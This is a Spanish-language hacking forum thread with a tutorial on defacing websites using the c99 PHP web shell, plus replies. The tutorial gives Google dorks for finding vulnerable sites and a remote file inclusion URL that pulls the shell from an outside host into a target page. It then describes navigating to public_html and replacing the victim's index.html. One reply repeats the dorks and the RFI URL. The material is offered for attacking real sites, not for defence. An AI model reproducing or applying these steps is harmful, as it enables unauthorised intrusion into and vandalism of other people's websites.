hola , bueno hoy es domingo dia de resaca asique no apatece realmente pegar brincos por aii asique decidi escrbir este tutorial para vosotros .
lo he titulado como defacear un sitio utilizando una shell c99
es posible que el av los detecte como virus :S
bueno una vez tengais la shell c99 vamos a buscar sitios vulnerables y para eso esta don google
tenemos varias opciones :
inurl : "upload.php"
inurl : "page = home.html"
inurl: "noticias / id ="
bueno esa es una manera de encontrar un shell c99 xD
Otra forma de búsqueda de sitios vulnerables es encontrar un sitio web que muestra al azaR
http://site.com/page =
en ese ejemplo subiendo una shell se vereia asi
http://site.com/page=http://geocities.com/noimus13/c99.txt
si su vulnerables vereis esto
(http://i50.tinypic.com/bjhnia.jpg)
^^ ahora vamos a agregar algunas cosas interesantes
lo primero que aremos sera ir al directorio de unicio
cual es ..??
Code:
public_html
O
Code:
httpd.www
Pero public_html se utiliza más
(http://i46.tinypic.com/2j2amuq.jpg)
Ahora vamos a navegar hasta el directorio
vale una ves que se pueda ver su index.html
eliminar eso : si tienes tu propio index.html entonces esto es lo que harias
(http://i48.tinypic.com/2s6r0it.jpg)
bueno y el resto del trabajo es cosa vuestra ... :P
es un tuto bastante simple como veis pero abeces asta lo evidente puede guardar sorpresas
salu2 ;)
buen tutorial, espero que me ayude con las dudas que tengo sobre subir shells
;)
Esto va en Bugs & Exploits, Movido :)
Buen tuto ^^
Saludos
el link no sirve -.-
otro?¡
tengan cuidado hay empresas ke se encargan de generar shells c99 falsas con el fin de conseguir la ip del "hacker"
es muy comun encontrar esto con estas dorks tan simples
inurl : "upload.php"
inurl : "page = home.html"
inurl: "noticias / id ="
y lo otro ke posteas es viejo se llama RFI si mal no recuerdo
http://site.com/page =
http://site.com/page=http://geocities.com/noimus13/c99.txt
pero bueno con algo de suerte aun se encuentran de esas
salu2